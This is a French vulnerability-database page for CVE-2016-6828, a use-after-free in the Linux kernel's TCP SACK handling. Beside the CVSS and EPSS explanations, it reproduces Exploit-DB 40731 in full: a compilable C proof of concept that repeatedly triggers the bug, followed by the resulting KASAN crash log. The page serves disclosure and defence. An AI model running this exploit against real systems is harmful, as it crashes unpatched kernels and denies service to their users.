CVE-2016-6828 : Détail

CVE-2016-6828

5.5
/
Moyen
Memory Corruption
0.05%V3
Local
2016-10-16
19h00 +00:00
2018-01-04
18h57 +00:00
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Descriptions du CVE

The tcp_check_send_head function in include/net/tcp.h in the Linux kernel before 4.7.5 does not properly maintain certain SACK state after a failed data copy, which allows local users to cause a denial of service (tcp_xmit_retransmit_queue use-after-free and system crash) via a crafted SACK option.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-416 Use After Free
The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory "belongs" to the code that operates on the new pointer.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V3.0 5.5 MEDIUM CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

Low

The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

[email protected]
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 40731

Date de publication : 2016-08-17 22h00 +00:00
Auteur : Marco Grassi
EDB Vérifié : No

// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html // to build clang derp4.c -o derp4 -static #include <unistd.h> #include <sys/syscall.h> #include <string.h> #include <stdint.h> #include <pthread.h> #include <stdio.h> #ifndef SYS_mmap #define SYS_mmap 9 #endif #ifndef SYS_socket #define SYS_socket 41 #endif #ifndef SYS_bind #define SYS_bind 49 #endif #ifndef SYS_sendto #define SYS_sendto 44 #endif #ifndef SYS_setsockopt #define SYS_setsockopt 54 #endif #ifndef SYS_dup #define SYS_dup 32 #endif #ifndef SYS_sendmsg #define SYS_sendmsg 46 #endif #ifndef SYS_recvfrom #define SYS_recvfrom 45 #endif #ifndef SYS_write #define SYS_write 1 #endif long r[62]; int main(int argc, char **argv) { while (1) { pid_t pid = fork(); if (pid == 0) { r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0); memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128); r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0); r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165); memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28); r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul); *(uint32_t*)0x20001fff = (uint32_t)0x2; r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0); r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0); *(uint32_t*)0x20018000 = (uint32_t)0x4; r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0); *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000; *(uint32_t*)0x2000dfd0 = (uint32_t)0xc; *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000; *(uint64_t*)0x2000dfe0 = (uint64_t)0x1; *(uint64_t*)0x2000dfe8 = (uint64_t)0x0; *(uint64_t*)0x2000dff0 = (uint64_t)0x0; *(uint32_t*)0x2000dff8 = (uint32_t)0x4; *(uint16_t*)0x2000e000 = (uint16_t)0x0; *(uint16_t*)0x2000e002 = (uint16_t)0x0; *(uint32_t*)0x2000e004 = (uint32_t)0xffff; *(uint32_t*)0x2000e008 = (uint32_t)0x401; *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a; *(uint64_t*)0x20000008 = (uint64_t)0x37; *(uint32_t*)0x2000ed3a = (uint32_t)0x14; *(uint16_t*)0x2000ed3e = (uint16_t)0x2; *(uint16_t*)0x2000ed40 = (uint16_t)0x12; *(uint32_t*)0x2000ed42 = (uint32_t)0x1f; *(uint32_t*)0x2000ed46 = (uint32_t)0x7; *(uint8_t*)0x2000ed4a = (uint8_t)0x6; *(uint8_t*)0x2000ed4b = (uint8_t)0x100; *(uint8_t*)0x2000ed4c = (uint8_t)0x3f; *(uint32_t*)0x2000ed4d = (uint32_t)0x11; *(uint16_t*)0x2000ed51 = (uint16_t)0x0; *(uint16_t*)0x2000ed53 = (uint16_t)0x808; *(uint32_t*)0x2000ed55 = (uint32_t)0x1; *(uint32_t*)0x2000ed59 = (uint32_t)0x0; *(uint8_t*)0x2000ed5d = (uint8_t)0x0; *(uint32_t*)0x2000ed5e = (uint32_t)0x12; *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea; *(uint16_t*)0x2000ed64 = (uint16_t)0x200; *(uint32_t*)0x2000ed66 = (uint32_t)0x5; *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff; *(uint8_t*)0x2000ed6e = (uint8_t)0x9; *(uint8_t*)0x2000ed6f = (uint8_t)0x1; r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0); *(uint16_t*)0x20001003 = (uint16_t)0x1; *(uint8_t*)0x20001005 = (uint8_t)0x0; *(uint32_t*)0x20001007 = (uint32_t)0x9; r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul); memcpy((void*)0x20015285, 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4096); r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul); r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); *(uint32_t*)0x20022fdd = (uint32_t)0x28; *(uint32_t*)0x20022fe1 = (uint32_t)0x400; *(uint64_t*)0x20022fe5 = (uint64_t)0x0; *(uint64_t*)0x20022fed = (uint64_t)0x8ab; *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb; *(uint16_t*)0x20022ffd = (uint16_t)0x5; r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0); } else if (pid > 0) { int returnStatus; waitpid(pid, &returnStatus, 0); printf("collected child\n"); } else { printf("fork failed\n"); exit(1); } } return 0; } // KASAN report on v4.8-rc1, equivalent on master /* [ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428 [ 21.447953] Read of size 4 by task rsyslogd/1612 [ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1 [ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151 [ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400 [ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400 [ 21.452873] Call Trace: [ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2 [ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70 [ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500 [ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70 [ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0 [ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0 [ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120 [ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0 [ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0 [ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0 [ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0 [ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20 [ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0 [ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210 [ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0 [ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0 [ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50 [ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0 [ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240 [ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0 [ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0 [ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120 [ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410 [ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0 [ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550 [ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0 [ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0 [ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50 [ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0 [ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90 [ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50 [ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0 [ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0 [ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340 [ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750 [ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 [ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20 [ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50 [ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500 [ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 [ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0 [ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0 [ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120 [ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280 [ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350 [ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420 [ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40 [ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0 [ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170 [ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580 [ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0 [ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0 [ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20 [ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110 [ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30 [ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340 [ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d [ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140 [ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0 [ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90 [ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424 [ 21.494277] Allocated: [ 21.494538] PID = 1711 [ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 [ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 [ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0 [ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20 [ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0 [ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0 [ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790 [ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10 [ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 [ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 [ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 [ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 [ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 [ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 [ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 [ 21.504144] Freed: [ 21.504368] PID = 1711 [ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 [ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 [ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0 [ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210 [ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0 [ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30 [ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10 [ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 [ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 [ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 [ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 [ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 [ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 [ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 [ 21.513258] Memory state around the buggy address: [ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc [ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 21.516114] ^ [ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 21.518203] ================================================================== */

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 4.7.4

Références

http://rhn.redhat.com/errata/RHSA-2017-0086.html
Tags : vendor-advisory, x_refsource_REDHAT
http://rhn.redhat.com/errata/RHSA-2017-0113.html
Tags : vendor-advisory, x_refsource_REDHAT
http://rhn.redhat.com/errata/RHSA-2017-0091.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.openwall.com/lists/oss-security/2016/08/15/1
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/92452
Tags : vdb-entry, x_refsource_BID
http://rhn.redhat.com/errata/RHSA-2017-0036.html
Tags : vendor-advisory, x_refsource_REDHAT